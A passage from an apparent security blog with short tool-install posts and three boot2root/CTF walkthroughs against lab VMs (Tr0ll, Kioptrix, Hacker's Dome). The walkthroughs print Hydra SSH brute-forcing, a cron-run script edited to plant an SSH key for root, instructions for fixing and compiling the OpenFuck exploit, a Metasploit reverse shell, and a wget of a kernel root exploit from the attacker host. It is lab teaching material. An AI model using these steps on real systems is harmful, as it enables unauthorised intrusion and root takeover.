Once this is done you’ll need to add the following line to /etc/fstab

linproc /compat/linux/proc linprocfs rw,late 0 0

Lastly we need to mount it using

mount linproc

Now you should be able to run Htop from your command line.

htop

PCAP, Traffic, Visualize, Wireshark

How to Visualize Network PCAP Files in Kali Linux

September 15, 2014 jbower Leave a comment

So this past weekend I attended the Security Onion Conference in Augusta, GA. While sitting in the back listening to some great speakers, @pentestfail and I were hacking away on a side project of his that involved analyzing a decent number of PCAP files.

As usual I was doing my analysis using Wireshark. But when trying to get a birds eye view of a network I really like to use something like Capsa (which I’ve only run on Windows) to quickly see the whole picture and let me find interesting bits of traffic.

Then I’ll use Wireshark to dig deeper into the things I want to look at. But I had only brought my laptop which is running Kali Linux.

So welcome NetworkMiner to the rescue. NetworkMiner is also a Windows program but can be run on Linux using mono pretty easily. Here’s how I got it up in running on my Kali Linux box in about 2 minutes.

apt-get install libmono-winforms2.0-cil

wget sourceforge.net/projects/networkminer/files/latest -O /tmp/networkminer

cd /tmp

unzip ./networkminer -d /opt

cd /opt/NetworkMiner_1-6-1

chmod +x NetworkMiner.exe

chmod -R go+w AssembledFiles/

chmod -R go+w Captures/

mono /opt/NetworkMiner_1-6-1/NetworkMiner.exe

And that’s it. I love it when a plan comes together!

Uncategorized

Defeating Tr0ll – Infosec Challenge Walkthrough

September 8, 2014 jbower Leave a comment

This is my walkthrough for defeating Tr0ll infosec challenge. This is another great “boot2root” VM that kept my guessing quite a few times. It also made me focus more on fully utilizing some of the scripts and programs I generally use during a penetration test. I also really liked the fact that Wireshark played a key role in solving this hacking challenge (Wireshark is pretty amazing in my book). So I sit down at my setup and begin.

The Tr0ll VM can be downloaded from
http://vulnhub.com/entry/tr0ll-1,100/

Footprinting:

After loading up the VM I use netdiscover -r to find it’s IP address which was 192.168.2.40

Scanning:

Now I start by seeing what Nmap can tell me about this system.

[email protected]:~/Desktop# nmap -sV -P0 -A 192.168.2.40

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-19 11:42 EDT
Nmap scan report for 192.168.2.40
Host is up (0.00060s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap [NSE: writeable]
22/tcp open ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_ 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn’t have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.46%I=7%D=8/19%Time=53F3705E%P=x86_64-unknown-linux-gnu%r
SF:(NULL,29,”SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n”);
MAC Address: 08:00:27:F2:5C:A9 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=6.46%E=4%D=8/19%OT=21%CT=1%CU=31767%PV=Y%DS=1

%DC=D%G=Y%M=080027%T
OS:M=53F3706A%P=x86_64-unknown-linux-gnu)SEQ(SP=106%GCD=1%ISR

=109%TI=Z%CI=I
OS:%II=I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3

=M5B4NNT11NW7%O4=M5B4ST11
OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4

=7120%W5=71
OS:20%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)

T1(R=Y%DF=Y%T=4
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W

=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK

=G%RUD=G)IE(R=Y
OS:%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.61 ms 192.168.2.40

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds

Enumeration:

Since the webserver is enabled I’ll continue to gather intel even though I really want to check out the FTP anonymous service that’s running. But patience really is a key to beating a lot of these challenges.

[email protected]:~# nikto -h http://192.168.2.40
– Nikto v2.1.6
—————————————————————————
+ Target IP:          192.168.2.40
+ Target Hostname:    192.168.2.40
+ Target Port:        80
+ Start Time:         2014-08-19 11:44:43 (GMT-4)
—————————————————————————
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ File/dir ‘/secret/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ “robots.txt” contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting…
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6605 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2014-08-19 11:45:03 (GMT-4) (20 seconds)
—————————————————————————
+ 1 host(s) tested

I also continue enumerating the webserver with dirb since it’s just part of my methodology and you just never know.

[email protected]moriarty:~# dirb http://192.168.2.40
—————–
DIRB v2.21
By The Dark Raver
—————–

START_TIME: Tue Aug 19 11:45:38 2014
URL_BASE: http://192.168.2.40/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4592

—- Scanning URL: http://192.168.2.40/ —-
+ http://192.168.2.40/index.html (CODE:200|SIZE:36)
+ http://192.168.2.40/robots.txt (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.2.40/secret/
+ http://192.168.2.40/server-status (CODE:403|SIZE:292)

—- Entering directory: http://192.168.2.40/secret/ —-
+ http://192.168.2.40/secret/index.html (CODE:200|SIZE:37)

—————–
DOWNLOADED: 9184 – FOUND: 4

Now my thinking is that I’ll check out the FTP service and then look into /secret web directory if FTP doesn’t lead anywhere. But FTP has to come first because who finds anonymous FTP access anymore? So this is at least interesting, which in my experience is a good indication that it will come into play at some point. I also looked at SSH but that seems to be pretty normal and trying to exploit this version would prove to be pretty difficult so I’ll leave that as a last resort. So the first attack vector to look into deeper is FTP. I’ll see if anonymous FTP access on this server can provide any clues or further information. If not then I’ll dig deeper into “vsftpd 3.0.2” to see what type of exploits are available for that version.

The anonymous FTP contains only a single file called “lol.pcap” which has really peaked my interest. I go ahead and look up “vsftpd 3.0.2” exploits but nothing really pops out immediately so I’ll put that on the back burner for now and focus on the pcap file.

[email protected]:~# ftp 192.168.2.40
Connected to 192.168.2.40.
220 (vsFTPd 3.0.2)
Name (192.168.2.40:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 .
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 ..
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> pwd
257 “/”
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (16587.2 kB/s)

My next step is to copy “lol.pcap” over to my machine and load this up in Wireshark and see what kind of traffic it has. Hopefully there will be some useful information for me to use.

So I see an FTP data session that shows a file transfer. Luckily FTP uses cleartext so I’ll be able to dig deeper into this. I can see a file that was transferred called “secret_stuff.txt”. I reconstruct the FTP transfer and what do you know? It gives me a nice little message.

Ok I can see that @maleus21 is messing with me. I go over the traffic several more times to make sure that I didn’t miss anything but it looks like I’ve found all the useful information. And of course I continue to feel mocked.

My only clue here is that “sup3rs3cr3tdirlol” is mentioning a directory. Since FTP doesn’t have anything more for me and I have no SSH information to go on my only hope is the webserver. So I whisper “Help me Apache 2.4.7….Your my only hope.” First I try out the /secret that I discovered earlier. But this is another dead end belittling my skills. But I check the source of the page just to make sure but it’s definitley a dead end.

With limited services running on this box I’m hoping that “sup3rs3cr3tdirlol” or “sup3rs3cr3t” is a web directory since I’m not really seeing any other options at the moment. So I try /sup3rs3cr3tdirlol as this is really my only move at this point. Fingers crossed and BOOM!, I’ve got something. This is when the little tingling feeling starts filling up my stomach.

Awesome, that worked and now I’ve got a file called “roflmao”. Let me check this out.

[email protected]:~/Desktop# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x0e42145e99e559aa4908f5c259d983044fcfd2f3, not stripped

Ok so it’s a 32-bit ELF file. Let me see what else I can find out about it.

[email protected]:~/Desktop/Troll# readelf -h roflmao
ELF Header:
Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class:                             ELF32
Data:                              2’s complement, little endian
Version:                           1 (current)
OS/ABI:                            UNIX – System V
ABI Version:                       0
Type:                              EXEC (Executable file)
Machine:                           Intel 80386
Version:                           0x1
Entry point address:               0x8048320
Start of program headers:          52 (bytes into file)
Start of section headers:          4428 (bytes into file)
Flags:                             0x0
Size of this header:               52 (bytes)
Size of program headers:           32 (bytes)
Number of program headers:         9
Size of section headers:           40 (bytes)
Number of section headers:         30
Section header string table index: 27

Everything looks pretty normal in the file and I don’t see anything slapping me in the face so it’s time to run “roflmao” and find out what it does.

[email protected]:~/Desktop/Troll# ./roflmao
Find address 0x0856BF to [email protected]:~/Desktop/Troll#

My immediate thought is that 0x0856BF is a memory address which starts making me sweat. Like all the great hackers before me whenever I get stuck, I stop and ask myself. What would Zero Cool do? Lol, actually I would never think that but it does make for a better story doesn’t it?

My actual thought is this. What’s the simplest solution? What do I know so far about this system? What do I know about how Maleus thinks so far? And my subconscious whispers “directory” which makes sense since it’s clear that Maleus likes using obscure directories as we’ve already seen.

Hacker Pro Tip: Don’t over complicate things. Remember KISS? This type of thinking has saved me more times than I can remember. Plus I’m always looking for shortest distance to an objective since I’m lazy. So why not try “0x0856BF” as a web directory since it will literally take 4 seconds.

So I go for the long shot and try /0x0856BF. Awesome, it is and more stuff is revealed. Two directories.

The first is /good_luck and the second
is /this_folder_contains_the_password. I check out the first folder and find this text file.

/0x0856BF/good_luck/which_one_lol.txt

Which contains the following.

maleus
ps-aux
felux
Eagle11
genphlux < — Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

So these look like user names so now I check out the second one. The second folder contains this file.

/0x0856BF/this_folder_contains_the_password/Pass.txt

Which has a nice little message.

Good_job_:)

Since FTP seems to be setup for anonymous access only I’m going to focus on SSH for the time being. I’m going to use Hydra to automate logging in with these accounts and “Good_job_:)” as the password.

So after several attempts I begin to get banned.

I’m not sure about the timeout since I control the VM. I keep on rebooting the VM and trying again but it’s the same story again and again. The only good thing was that after numerous failed attempts I started looking into Hydra parameters more than I have before and learned quite a bit more about better ways to use it which I know will serve me better in the future.

After trying all the accounts with “Good_job_:)” and getting no luck I stop and take a break to clear my head. I’m clearly missing something. After some time away I come back and go through everything again to see what I’ve missed. Knowing myself it’s probably some small detail that I’ve overlooked. I start looking at things a little more closely to see if I could come up with a few more passwords to try. That’s where reading the folder gave me the idea for two more password choices so my password list became this.

Pass
Pass.txt

After trial and error and numerous more reboots I finally get a match for “overflow” and “Pass.txt”. Sweet!

Gaining Access:

Shell – Here I come.

As soon as I start looking around I get this message and I’m booted.

Broadcast Message from [email protected]
(somewhere) at 10:00 …

TIMES UP LOL!

Connection to 192.168.2.40 closed by remote host.
Connection to 192.168.2.40 closed.

Ok so it looks like my session is being timed out. I log back in and do a quick run through for any files that catch my eye.

$ cd /var/tmp
$ ls -al
total 12
drwxrwxrwt 2 root root 4096 Sep 2 12:17 .
drwxr-xr-x 12 root root 4096 Aug 10 03:56 ..
-rwxrwxrwx 1 root root 34 Aug 13 01:16 cleaner.py.swp
Looking at the swp file I see it refers to cleaner.py as you’d think but doesn’t provide any other information.

Even though overflow is a low level user I do a “find / -name cleaner.py” anyway to save some time.

Ok so the very last line shows us that cleaner.py is located in /lib/log/ and a “ls -al” shows it’s owned by root. This could be good.

I use VI to see what’s going on.

#!/usr/bin/env python
import os
import sys
try:
os.system(‘rm -r /tmp/* ‘)
except:
sys.exit()

Knowing that root owns this file and seeing os.system I know what my next move is going to be. I’m going to have os.system echo my ssh key into the authorized_keys for root. I’ve never actually done this all in a single line but it should work (at least in theory).

So here’s what cleaner.py ends up looking like. (I’ve shorten my key to save space but you get the point.)

#!/usr/bin/env python
import os
import sys
try:
os.system(‘mkdir /root/.ssh; chmod 775 .ssh; echo “ssh-dss AAAAB3NzaC1kc3MAAACBAI0mFQzmVthxmCywdKX/ZYDnN/9CzgpRsVTYRgffWU+43xuNRoy+HUGUBxGTuQBaaPMLYEMZgQFkvc+xG0sTfjf73

CqR0lKO8+rUyUTCJTzWpjWh9zf2/tHEiXjGAveBwiay1vLsGFEO47QXmyu+lRgFjg

== [email protected]” >> /root/.ssh/authorized_keys ‘)
except:
sys.exit()

Now I save the file and wait for it to be kicked off. What’s interesting is that when trying to save my changes in VI it comes up with a permissions error since I’m logged in as “overflow”. But when using “cat” I can see that my changes have been saved. Sweet luck for me! After being disconnected it’s time to try to login as root.

And success!! I’m logged into Tr0ll as root. Then I looked to see if there is any type of flag.

[email protected]:/lib/log#
[email protected]:/lib/log# cd /root/
[email protected]:~# ls
proof.txt
[email protected]:~# cat proof.txt
Good job, you did it!

702a8c18d29c6f3ca0d99ef5712bfbdc

Uncategorized

Kioptrix Level 1 Hacking Challenge Walkthrough

August 13, 2014 jbower Leave a comment

This is a walkthrough for Kioptrix Level 1. Although getting root on this box is pretty straightforward it’s a great place for those looking to get their feet wet when it comes to boot2root VM’s. I actually suggest this as a starting place rather than something like Metasploitable2, which is almost overwhelming with it’s list of vulnerabilities.The Kioptrix Level 1 VM can be downloaded from http://vulnhub.com/entry/kioptrix-level-1-1,22/

Footprinting:

After loading up the VM I used netdiscover -r to find it’s IP address which was 192.168.2.90

Scanning:

Now it’s time to use Nmap to grab info about what ports and services are available.

[email protected]:~# nmap -sV -P0 -A 192.168.2.90

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 11:42 EDT
Nmap scan report for 192.168.2.90
Host is up (0.00069s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after: 2010-09-26T08:32:06+00:00
|_ssl-date: 2014-08-13T19:43:04+00:00; +3h59m58s from local time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open status 1 (RPC #100024)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
MAC Address: 08:00:27:C4:86:B7 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)

TRACEROUTE
HOP RTT ADDRESS
1 0.69 ms 192.168.2.90

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.77 seconds

The first thing I noticed is that most of these services are pretty out dated which is good news. The second thing that grabs my attention is the version of Apache that is being run. There are clearly several different services running that may provide a foothold into the box but I decided to stick with Apache since it caught my eye. I fire up Iceweasel and find a default looking Apache page running on the webserver. Now to run Nikto to see what kind of information it can gather about the webserver.

Enumeration:

[email protected]:~# nikto -h 192.168.2.90
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.2.90
+ Target Hostname: 192.168.2.90
+ Target Port: 80
+ Start Time: 2014-08-13 11:44:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 7355 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2014-08-13 11:44:53 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Gaining Access:

Ok so the first thing that Nikto returns is

+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

I do a simple Google search to see if there are any obvious exploits that fit my needs.

Well the first result seems to fit the bill quite well. Now I’m going to use searchsploit to see if I’ve already got this exploit.

[email protected]:~# searchsploit apache openssl
Description Path
————————————————————- ———————————-
Apache OpenSSL – Remote Exploit (Multiple Targets) (OpenFuck | /linux/remote/764.c

Alright, now it’s time to copy this into my /tmp/exploit directory and see what we’ve got.

Ok so the very first section gives us what we need.

/*

* http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/

*

* OF version r00t VERY PRIV8 spabam

* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto

* objdump -R /usr/sbin/httpd|grep free to get more targets

* #hackarena irc.brasnet.org

*/

If you try to compile this without changing the code you'll end up with a bunch of errors and issues.

Luckily the paulsec write up is very straight forward. So here are the changes I made.

Here are the steps I used to get this to compile in VI.
 1) Add these two headers:
 #include
 #include


 2) Update the URL of the C file:
 Search for packetstorm and replace the URL with the following


 http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c


 3) Install the libssl-dev library if you don't have it already:


 apt-get install libssl-dev


 4) Update the declaration of variables:
 Search for
 unsigned char *p
 and change it to
 const unsigned char *p, *end;

5) Compile the code and Bob's your uncle:
 To compile:
 gcc -o exploit 764.c -lcrypto

So the exploit compiled without any issues this time. Now it’s time to move in for the kill.

[email protected]:/tmp/exploit# ./exploit | grep -i redhat | grep “1.3.20”

This shows me that I’ve got two options for this exploit so I first try the 0x6a but it doesn’t quite work out.

So I try the 2nd which is 0x6b and decide to add a range of 40 connections for a better shot at getting this to work.

And there it is. Root access on Kioptrix Level 1. Feel free to leave feedback and questions in the comments.

CTF, Metasploit

Double Kill – Hacker’s Dome CTF Walk Through Part 1

July 28, 2014 jbower Leave a comment

This past weekend our Quantum Security CTF Team (consisting of Kamil @vavkamil and myself @jamesbower ) competed on the Hacker’s Dome – Double Kill CTF. The competition consisted of two vulnerable machines with each containing both a user flag and a super user (root) flag. We were able to capture both flags on the first server and here is the walk through.

First target: 10.200.0.4

Nmap scan:
==========

Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-26 17:06 CEST
Nmap scan report for 10.200.0.4
Host is up (0.067s latency).
Not shown: 996 closed ports
PORT    STATE    SERVICE     VERSION
22/tcp open     ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3d:ab:fe:49:52:95:1e:f5:bf:9f:eb:ff:d8:6e:fb:16 (DSA)
|   2048 5c:43:53:0c:cb:50:57:3b:c6:b6:68:32:4d:fd:5c:f9 (RSA)
|_ 256 f0:d9:63:a2:e0:b8:47:cc:46:32:19:2f:89:4b:a7:e4 (ECDSA)
80/tcp open     http        Apache httpd 2.2.22 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title: phpMyAdmin
|_Requested resource was http://10.200.0.4/phpMyAdmin-4.2.6-all-languages/
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 9 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSH is relatively up to date and so is Apache so time to see what Nikto finds.

Nikto scan:
===========

—————————————————————————
+ Target IP:          10.200.0.4
+ Target Hostname:    10.200.0.4
+ Target Port:        80
+ Start Time:         2014-07-26 11:22:26 (GMT-4)
—————————————————————————
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 7355 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2014-07-26 11:40:41 (GMT-4) (1095 seconds)
—————————————————————————

At first I spent quite a bit of time in the /phpMyAdmin-4.2.6-all-languages directory trying to find some type of foothold. But this remained fruitless and I felt like I was wasting too much time on one thing. I decided to continue enumerating to see if anything else would appear that I could use.

More enumeration:
=================

Dirb finds nothing of real interest.

http://10.200.0.4/cgi-bin/

Going back over my Nikto results I see this (OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution.)

I wasn’t familiar with this vulnerability so I dug a little bit deeper and came across a great couple of articles about it and was eventually able to find out that Metasploit already had a module for it. Great!

Exploitation:
=============

https://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection

msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

Name         Current Setting Required Description
—-         ————— ——– ———–
PLESK        false            yes       Exploit Plesk
Proxies                       no        Use a proxy chain
RHOST                         yes       The target address
RPORT        80               yes       The target port
TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
URIENCODING 0                yes       Level of URI URIENCODING and padding (0 for minimum)
VHOST                         no        HTTP server virtual host

Exploit target:

Id Name
— —-
0 Automatic

msf exploit(php_cgi_arg_injection) > set RHOST 10.200.0.4
RHOST => 10.200.0.4
msf exploit(php_cgi_arg_injection) > set LPORT 8080
LPORT => 80
msf exploit(php_cgi_arg_injection) > exploit

[*] Started reverse handler on 172.16.237.66:8080
[*] Sending stage (40551 bytes) to 10.200.0.4
[*] Meterpreter session 1 opened (172.16.237.66:8080 -> 10.200.0.4:59780) at 2014-07-26 22:40:23 +0200

meterpreter > shell
Process 28156 created.
Channel 0 created.
python -c ‘import pty; pty.spawn(“/bin/bash”)’

First flag:
===========

[email protected]:/var/www$ cat user-trohphy.txt
40a5e0e8aa540359d7e99304118cc86aebabd08c

With this we’re able to get the first user-trophy.txt and move on to getting a root shell.

Local root exploit:
===================

3.2.0-23-generic
x86_64 x86_64 x86_64

http://www.exploit-db.com/exploits/33589/

[email protected]:/tmp/infinity$ wget 172.16.237.66/exploit.c
wget 172.16.237.66/exploit.c
–2014-07-26 23:42:11– http://172.16.237.66/exploit.c
Connecting to 172.16.237.66:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 3845 (3.8K) [text/x-csrc]
Saving to: `exploit.c’

100%[======================================>] 3,845 –.-K/s in 0s

2014-07-26 23:42:11 (20.3 MB/s) – `exploit.c’ saved [3845/3845]

[email protected]:/tmp/infinity$ gcc exploit.c -O2 -o vnik
gcc exploit.c -O2 -o vnik
[email protected]:/tmp/infinity$ ./vnik 0
./vnik 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
[email protected]:/tmp/infinity# whoami
whoami
root
[email protected]:/tmp/infinity# cd /root
cd /root
[email protected]:~# ls
ls
superuser-trophy.txt

Second flag:
===========

[email protected]:~# cat superuser-trophy.txt
cat superuser-trophy.txt
8f8bc25a81e76ffd51e534eb0633eeb0c70cdf01

[email protected]:~#

James Bower – Security Eng and Data Science | Follower of Christ

Linux Memory Analysis: How to Start and What You Need to Know

Threat Profile: Killer Swag

Introduction

Summary

Behavior

Infrastructure

Malware Analysis

Network Analysis

Detection

Remediations

IOC

Threat Hunting with Bro IDS

How to Install Bro IDS 2.5 on Ubuntu 16.0x

SkyDog Con 2016 CTF – Walk Through Guide

How to Install Bro IDS 2.5 on Ubuntu 16.0x

SkyDog Con CTF – The Legend Begins

Sky Dog Con CTF – Over but not forgotten.

